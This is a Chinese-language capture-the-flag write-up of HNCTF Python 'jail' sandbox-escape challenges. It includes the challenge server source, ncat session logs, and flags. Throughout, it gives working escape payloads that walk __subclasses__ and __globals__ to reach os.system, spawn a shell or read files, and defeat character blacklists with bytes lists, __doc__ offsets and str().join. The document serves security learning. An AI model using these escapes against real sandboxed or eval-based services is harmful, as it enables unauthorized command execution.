HNCTF Jail---沙盒逃逸题目--2
calc_jail_beginner_level5
PS C:\Users\lenovo> ncat node5.anna.nssctf.cn 27812
_ _ _ _ _ _ _ _____
| | (_) (_) (_) | | | | ____|
| |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | _____ _____| | |__
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ |___ \
| |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | __/\ V / __/ |___) |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_|_|\___| \_/ \___|_|____/
__/ | _/ |
|___/ |__/
It's so easy challenge!
Seems flag into the dir()
这个题没有给附件
但是比较简单一句话直接出了
PS C:\Users\lenovo> ncat node5.anna.nssctf.cn 27812
_ _ _ _ _ _ _ _____
| | (_) (_) (_) | | | | ____|
| |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | _____ _____| | |__
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ |___ \
| |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | __/\ V / __/ |___) |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_|_|\___| \_/ \___|_|____/
__/ | _/ |
|___/ |__/
It's so easy challenge!
Seems flag into the dir()
> __import__("os").system("cat flag")
flag=NSSCTF{00e182ae-725d-4a42-9ed0-e816791735c1}
0
calc_jail_beginner_level5.1
PS C:\Users\lenovo> ncat node5.anna.nssctf.cn 21263
_ _ _ _ _ _ _ _____ __
| | (_) (_) (_) | | | | ____/_ |
| |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | _____ _____| | |__ | |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ |___ \ | |
| |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | __/\ V / __/ |___) || |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_|_|\___| \_/ \___|_|____(_)_|
__/ | _/ |
|___/ |__/
It's so easy challenge!
Seems flag into the dir()
> my_flag.__class__.__base__.__subclasses__()[-6].__init__.__globals__['system']('bash')
bash: cannot set terminal process group (97): Inappropriate ioctl for device
bash: no job control in this shell
ctf@d6f50b89d1dd4dd4:~$ cat flag
flag=NSSCTF{0e4a722d-35ba-4bba-a055-14365c1f1288}
ctf@d6f50b89d1dd4dd4:~$
采用上一题的不行
就跟着这个 my_flag继续把 os.wrap给带出来
my_flag
#发现这个
my_flag.__class__.__base__.__subclasses__()
my_flag.__class__.__base__.__subclasses__()[-6]
#os.wrap
my_flag.__class__.__base__.__subclasses__()[-6].__init__.__globals__['system']('bash')
分析,我们把他使用代码拿出来看
server.py:
#It's an challenge for jaillevel5 let's read your flag!
import load_flag
BLACKLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'open','print']
exec_func = exec
compile_func = compile
print_func = print
for k in BLACKLIST:
del __builtins__.__dict__[k]
del __loader__, __builtins__
flag = load_flag.get_flag()
def main():
WELCOME = '''
_ _ _ _ _ _ _ _____ __
| | (_) (_) (_) | | | | ____/_ |
| |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | _____ _____| | |__ | |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ |___ \ | |
| |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | __/\ V / __/ |___) || |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_|_|\___| \_/ \___|_|____(_)_|
__/ | _/ |
|___/ |__/
'''
print_func(WELCOME)
print_func("It's so easy challenge!")
print_func("Seems flag into the dir()")
repl()
def repl():
my_global_dict = dict()
my_global_dict['my_flag'] = flag
input_code = input("> ")
complie_code = compile_func(input_code, '<string>', 'single')
exec_func(complie_code, my_global_dict)
if __name__ == '__main__':
main()
在 load_flag
open_func = open
class secert_flag(str):
def __repr__(self) -> str:
return "DELETED"
def __str__(self) -> str:
return "DELETED"
class flag_level5:
def __init__(self, flag: str):
setattr(self, 'flag_level5', secert_flag(flag))
def get_flag():
with open_func('flag') as f:
return flag_level5(f.read())
calc_jail_beginner_level4(JAIL)
代码和过滤如下
#No danger function,no chr,Try to hack me!!!!
#Try to read file ./flag
BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr']
eval_func = eval
for m in BANLIST:
del __builtins__.__dict__[m]
del __loader__, __builtins__
def filter(s):
not_allowed = set('"\'`')
return any(c in not_allowed for c in s)
WELCOME = '''
_ _ _ _ _ _ _ _ _
| | (_) (_) (_) | | | | | || |
| |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _|
| |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_|
__/ | _/ |
|___/ |__/
'''
print(WELCOME)
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
if filter(input_data):
print("Oh hacker!")
exit(0)
print('Answer: {}'.format(eval_func(input_data)))
解题思路:
这一题我是用bytes绕过的,
直接用之前贴那个bytes生成的脚本
# ls
().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,11
6,101,109]).decode()](bytes([108,115]).decode())
# cat flag
().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([99,97,116,32,102,108,97,103]).decode())
结果如下
PS C:\Users\lenovo> ncat node5.anna.nssctf.cn 25243
_ _ _ _ _ _ _ _ _
| | (_) (_) (_) | | | | | || |
| |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _|
| |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_|
__/ | _/ |
|___/ |__/
Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> ().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([99,97,116,32,102,108,97,103]).decode())
flag=NSSCTF{f7ba8ac2-f0e2-4f26-9f9b-fb4eacae4a9a}
Answer: 0
看文章新学一种思路
https://scofield.top/hnctf_pyjail/#calc_jail_beginner_level4
利用 __doc__偏移量
().__class__.__base__.__subclasses__()[-4].__init__.__globals__[().__doc__[19]+().__doc__[86]+().__doc__[19]+().__doc__[4]+().__doc__[17]+().__doc__[10]](().__doc__[19]+().__doc__[56])
calc_jail_beginner_level4.0.5
同上一题
PS C:\Users\lenovo> ncat node5.anna.nssctf.cn 25476
_ _ _ _ _ _ _ _ _ ___ _____
| | (_) (_) (_) | | | | | || | / _ \ | ____|
| |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_| | | || |__
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _| | | ||___ \
| |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |_| |_| | ___) |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_(_)\___(_)____/
__/ | _/ |
|___/ |__/
Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals and `,",' Good luck!
> ().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([99,97,116,32,102,108,97,103]).decode())
flag=NSSCTF{a7cc205c-6a04-403c-9ef8-39dccc58b6cb}
Answer: 0
calc_jail_beginner_level4.1(JAIL)
这一题用bytes报错,用 __doc__可以出
但是又是学习了一下这个灵活程度
直接再利用一次这个
参考:https://zhuanlan.zhihu.com/p/579057932
().__class__.__base__.__subclasses__()[-4].__init__.__globals__[().__class__.__base__.__subclasses__()[6]([115, 121, 115, 116, 101, 109]).decode()](().__class__.__base__.__subclasses__()[6]([115, 104]).decode())
calc_jail_beginner_level4.2
过滤再过滤,
PS C:\Users\lenovo> ncat node5.anna.nssctf.cn 25155
_ _ _ _ _ _ _ _ _ ___
| | (_) (_) (_) | | | | | || | |__ \
| |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_ ) |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _| / /
| |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |_ / /_
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_(_)____|
__/ | _/ |
|___/ |__/
Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals,byte and `,",',+ Good luck!
>
可以利用上一题我们学习的那个方法,嵌套 __subclasses__
主要是➕号被ban了,不然 __doc__还是可以使用的
使用join方法
最后:
().__class__.__base__.__subclasses__()[-4].__init__.__globals__[str().join([().__doc__[19],().__doc__[86],().__doc__[19],().__doc__[4],().__doc__[17],().__doc__[10]])](str().join([().__doc__[19],().__doc__[56]]))
calc_jail_beginner_level4.3
同上
